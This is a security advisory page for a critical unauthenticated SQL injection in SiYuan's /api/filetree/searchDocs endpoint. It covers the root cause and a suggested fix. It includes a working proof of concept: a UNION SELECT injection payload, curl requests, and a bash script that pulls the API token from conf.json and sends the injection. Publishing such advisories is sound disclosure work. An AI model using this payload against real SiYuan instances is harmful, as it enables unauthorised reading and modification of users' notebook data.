GHSA-33jq-p8c2-q3q4

Suggest an improvement
Source
https://github.com/advisories/GHSA-33jq-p8c2-q3q4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-33jq-p8c2-q3q4/GHSA-33jq-p8c2-q3q4.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-33jq-p8c2-q3q4
Aliases
Published
2026-10-01T14:38:48Z
Modified
2026-10-01T15:44:10Z
Severity
  • 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N CVSS Calculator
Summary
SiYuan: Unauthenticated SQL injection in searchDocs via unescaped keyword (publish mode): cross-notebook read/write with statement stacking
Details

Summary

The /api/filetree/searchDocs endpoint concatenates the caller-supplied search keyword directly into a SQL statement with no escaping and no parameter binding. The endpoint is gated by CheckAuth only reachable by the publish RoleReader token, and by the anonymous account when Publish.Auth.Enable is false. The resulting statement runs on a read-write SQLite handle through a driver that executes stacked (;-separated) statements, against the global blocks table spanning all cleartext notebooks. An unauthenticated request can therefore read and write database content across every non-encrypted notebook on the instance.

Details

Data flow, unescaped and unbound at every hop:

  • searchDocs (kernel/api/filetree.go): k := arg["k"].(string) passed straight to model.SearchDocs(k, …), no sanitization.
  • SearchDocs (kernel/model/file.go): after TrimSpace and strings.Fields, each token is spliced into a single-quoted LIKE literal by concatenation condition.WriteString("(hpath LIKE '%" + k + "%'"). No escaping, no '' doubling, no bind placeholder.
  • NAMFilter (kernel/conf/search.go): appends " OR name LIKE '%" + keyword + "%'" (and alias, memo) the same way, enabled by default.
  • QueryRootBlockByCondition (kernel/sql/block_query.go): "SELECT *, … FROM blocks WHERE type = 'd' AND " + condition + " ORDER BY … LIMIT …" passed to query(sqlStmt).

The only value-inspecting guard is ast.IsNodeIDPattern(keyword), which merely routes an exact-ID-shaped keyword to a different branch; a normal keyword falls through to the concatenation. strings.Fields prevents literal whitespace within a token this constrains payload construction but is not sanitization or confinement.

Driver / statement stacking. The driver is the vendored github.com/88250/go-sqlite3 (mattn fork), registered as sqlite3_extended. query() calls db.Query, and the driver's connection query implementation loops over ;-separated statements preparing and executing each in turn so a stacked statement executes for its side effects. SiYuan's CheckSingleStatement / CheckReadonlyStatement guards exist but are wired only into the explicit SQL endpoints (api/sql.go, cli, mcp); the searchDocs > query() path does not call them.

Handle. The DSN (kernel/model/database.go) sets _journal_mode=WAL&_synchronous=OFF&… with no mode=ro and no _query_only. It is the same read-write handle used for indexing Exec calls, so stacked INSERT/UPDATE/DELETE execute, and ATTACH is available. load_extension is not enabled in this build (no build tag / ConnectHook enabling it), so the ceiling is database read/write, not code execution.

Scope. The blocks table indexes every opened non-encrypted notebook. Encrypted notebooks use separate per-box databases and are excluded. Scope is therefore all cleartext notebook content on the instance cross-notebook, not publish-scoped.

Impact

An unauthenticated request (publish mode with auth disabled) or any publish RoleReader reaches an unescaped, unparameterized SQL concatenation on a read-write handle whose driver executes stacked statements, against a table spanning all cleartext notebooks. This permits cross-notebook disclosure of document content and, via statement stacking on the read-write handle, modification of database content (and ATTACH-reachable files). No admin role, no CSRF token, no write permission through the normal API is required; the publish surface alone is sufficient. Encrypted notebooks are not exposed. Code execution is not reachable in the default build (no load_extension).

Root cause

The keyword is split on whitespace and each token is spliced into a LIKE literal without escaping or binding:

  • SearchDocs builds each condition as (hpath LIKE '%<token>%' ...) (file.go:199).
  • NAMFilter appends OR name LIKE '%<token>%', alias, memo the same way (search.go:135-142).
  • QueryRootBlockByCondition concatenates that condition into SELECT *, length(hpath) - length(replace(hpath, '/', '')) AS lv FROM blocks WHERE type = 'd' AND <condition> ORDER BY box DESC, lv ASC LIMIT <n> and calls query() (block_query.go:74-75).
  • query() calls db.Query() with no call to the project's own CheckSingleStatement / CheckReadonlyStatement guards, which are wired only into api/sql.go (the explicit SQL endpoints), not this path (database.go:1426-1436).

The only pre-sink check is ast.IsNodeIDPattern (file.go:179), which merely routes exact-ID-shaped input to a different (also concatenated) branch, it does not sanitize.

Reachability / auth tier

  • Route middleware is model.CheckAuth only no CheckAdminRole.
  • The publish reverse proxy injects a token resolving to RoleReader, or the anonymous account when Publish.Auth.Enable=false. Both satisfy CheckAuth.
  • The handler applies no publish-access / read-only / role check, and SearchDocs applies no post-query scope filter.
  • Query targets the global blocks table = all opened non-encrypted notebooks (cross-boundary). Encrypted notebooks use separate DBs and are excluded.

Proof of concept (read-only discloses sqlite_version())

Demonstrated against a local instance. Read-only: the PoC runs a single SELECT … UNION SELECT and surfaces the SQLite version string through the search response. No data is modified.

1. Prerequisites

  • A local SiYuan kernel running (default http://127.0.0.1:6806).
  • The API token from Settings > About > API token (omit if no access-auth code is set).
  • One opened notebook id (17 chars), e.g. from POST /api/notebook/lsNotebooks.

2. Why the payload is shaped this way

  • The kernel places the keyword as hpath LIKE '%<K>%', so the payload closes the string literal and the condition group, appends a UNION SELECT, and comments out the trailing %', ORDER BY, and LIMIT.
  • The keyword is whitespace-split (strings.Fields), so literal spaces are replaced with /**/ SQL comments.
  • blocks has 21 columns; the query adds a computed lv, so the UNION SELECT must supply 22 values. Only col 5 (Box) and col 6 (Path) matter: col 5 must equal an opened notebook id (result loop skips rows whose box is not open file.go:230) and col 6 is returned verbatim as the response path field.

3. PoC

  1. Open the web UI once (unlocks + ensures a notebook is open)

  2. Browser > http://127.0.0.1:6806

  3. Enter the access-auth code: poctestcode

  4. Let it finish loading. A fresh instance opens with a default notebook in the left sidebar that's what the PoC needs (the injection surfaces through an open notebook). If the sidebar is empty, click + > New notebook, name it anything, and make sure it's open (bold, not greyed).

  5. Grab the API token

docker exec siyuan-poc grep -o '"token":"[^"]*"' /siyuan/workspace/conf/conf.json
TOKEN="paste_the_token_value_here"
  1. Get the open notebook's ID

curl -s -X POST "http://127.0.0.1:6806/api/notebook/lsNotebooks" -H "Authorization: Token $TOKEN" Copy an id whose "closed":false, then: BOX_ID="paste_that_id_here"

  1. Build the request body
cat > body.json <<EOF
{"k":"poc%')/**/union/**/select/**/'poc','','poc','','$BOX_ID',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--"}
EOF

(The heredoc substitutes $BOX_ID for you, no manual editing.)

  1. Fire the injection

curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d @body.json | grep -o '"path":"[0-9][^"]*"' Expected: the SQLite version string, e.g. "path":"3.45.1", proof the keyword was executed as SQL. Screenshot this for the advisory.

  1. Confirm the row is genuinely injected (optional sanity check)

Run the same request with a benign keyword and confirm no version appears: curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d '{"k":"poc"}' | grep -o '"path":"[0-9][^"]*"' # returns nothing The differential (version appears only with the crafted keyword) is clean evidence for the report.


If Step 5 returns empty: 5. Fire the injection

curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d @body.json | grep -o '"path":"[0-9][^"]*"' Expected: the SQLite version string, e.g. "path":"3.45.1", proof the keyword was executed as SQL. Screenshot this for the advisory.

  1. Confirm the row is genuinely injected (optional sanity check)

Run the same request with a benign keyword and confirm no version appears: curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d '{"k":"poc"}' | grep -o '"path":"[0-9][^"]*"' # returns nothing

The differential (version appears only with the crafted keyword) is clean evidence for the report.

Or you can use this script to do the whole process at once:

#!/usr/bin/env bash
#
# siyuan_sqli_poc.sh
# Read-only PoC: proves SQL injection in /api/filetree/searchDocs by disclosing
# sqlite_version() through the search response. Modifies NO data.

set -u
export MSYS_NO_PATHCONV=1   # stop Git Bash from mangling container-absolute paths

# ---- config ---------------------------------------------------------------
BASE="${BASE:-http://127.0.0.1:6806}"
CONTAINER="${CONTAINER:-siyuan-poc}"
CONF="/siyuan/workspace/conf/conf.json"
# ---------------------------------------------------------------------------

CONF="/siyuan/workspace/conf/conf.json"
# ---------------------------------------------------------------------------

say()  { printf '\n\033[1m== %s\033[0m\n' "$*"; }
ok()   { printf '\033[32m[OK]\033[0m %s\n' "$*"; }
warn() { printf '\033[33m[!!]\033[0m %s\n' "$*"; }
die()  { printf '\033[31m[XX]\033[0m %s\n' "$*"; exit 1; }

# 1. container up?
say "Checking container"
docker ps --format '{{.Names}}' | grep -qx "$CONTAINER" \
  || die "Container '$CONTAINER' is not running. Start it, then re-run."
ok "container '$CONTAINER' is running"

# 2. API alive?
say "Waiting for kernel API"
for i in $(seq 1 30); do
  if curl -sf "$BASE/api/system/version" >/dev/null 2>&1; then
    ok "API responding at $BASE"; break
  fi
  sleep 1
  [ "$i" = 30 ] && die "API not responding. Open $BASE in a browser, enter the access code, then re-run."
done

# 3. token from conf.json
say "Reading API token"
TOKEN=$(docker exec "$CONTAINER" cat "$CONF" 2>/dev/null \
  | grep -oE '"token"[[:space:]]*:[[:space:]]*"[^"]*"' | head -1 \
  | sed -E 's/.*:[[:space:]]*"([^"]*)".*/\1/')
if [ -n "$TOKEN" ]; then
  ok "token found"
  AUTH=(-H "Authorization: Token $TOKEN")
else
  warn "no token in conf.json (instance may not be initialized, or auth is disabled)."
  warn "  -> open $BASE, enter the access code, let the UI load, then re-run."
  AUTH=()
fi

# 4. an OPEN notebook id
say "Finding an open notebook"
NB=$(curl -s -X POST "$BASE/api/notebook/lsNotebooks" "${AUTH[@]}")
BOX_ID=$(echo "$NB" | tr '}' '\n' | grep '"closed":false' \
  | grep -oE '"id":"[^"]+"' | head -1 | sed -E 's/"id":"([^"]+)"/\1/')
[ -n "$BOX_ID" ] || die "No OPEN notebook found. Open one in the UI ($BASE) and re-run.  Raw: $NB"
ok "using open notebook: $BOX_ID"

# 5. build the read-only payload (22-column UNION; col5=box, col6=sqlite_version())
say "Building request body"
PAYLOAD="poc%')/**/union/**/select/**/'poc','','poc','','${BOX_ID}',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--"
printf '{"k":"%s"}' "$PAYLOAD" > body.json
ok "wrote body.json"

# 6. fire the injection
say "Sending injection"
RESP=$(curl -s -X POST "$BASE/api/filetree/searchDocs" \
  -H "Content-Type: application/json" "${AUTH[@]}" -d @body.json)
VER=$(echo "$RESP" | grep -oE '"path":"[0-9][^"]*"' | head -1 | sed -E 's/"path":"([^"]*)"/\1/')

# 7. benign differential (must NOT return a version)
BENIGN=$(curl -s -X POST "$BASE/api/filetree/searchDocs" \
  -H "Content-Type: application/json" "${AUTH[@]}" -d '{"k":"poc"}' \
  | grep -oE '"path":"[0-9][^"]*"' | head -1)

# 8. verdict
say "Result"
if [ -n "$VER" ] && [ -z "$BENIGN" ]; then
  ok "SQL injection CONFIRMED"
  printf '     leaked sqlite_version() = \033[1m%s\033[0m\n' "$VER"
  printf '     (benign keyword returned no version -> value came from injected SQL)\n'
else
  warn "no version surfaced. Checking kernel log for the assembled statement..."
  docker exec "$CONTAINER" sh -c 'grep "sql query" /siyuan/workspace/temp/siyuan.log 2>/dev/null | tail -3' || true
  warn "If you see 'sql query [...] failed', it's a column-count mismatch on this build."
  warn "If no error line: the box filter dropped the row -> confirm BOX_ID is an OPEN notebook."
  printf '     raw response: %s\n' "$RESP"
fi

bash siyuan_sqli_poc.sh

image

Suggested fix

Parameterize the search. The load-bearing fix is at SearchDocs and NAMFilter: bind the keyword as a parameter rather than concatenating it, or at minimum escape ' and the LIKE metacharacters and pass via a bound argument. Secondarily, route the searchDocs > query() path through the existing CheckSingleStatement / CheckReadonlyStatement guards so this and any similar internal query path cannot stack statements or write. Consider opening the query handle used by read paths with _query_only=1.

Database specific
{
    "cwe_ids":  [
        "CWE-89"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-10-01T14:38:48Z",
    "nvd_published_at":  null,
    "severity":  "CRITICAL"
}
References

Affected packages

Go / github.com/siyuan-note/siyuan/kernel

Package

Name
github.com/siyuan-note/siyuan/kernel
View open source insights on deps.dev
Purl
pkg:golang/github.com/siyuan-note/siyuan/kernel

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.0.0-20260721043339-eef10568384e

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-33jq-p8c2-q3q4/GHSA-33jq-p8c2-q3q4.json"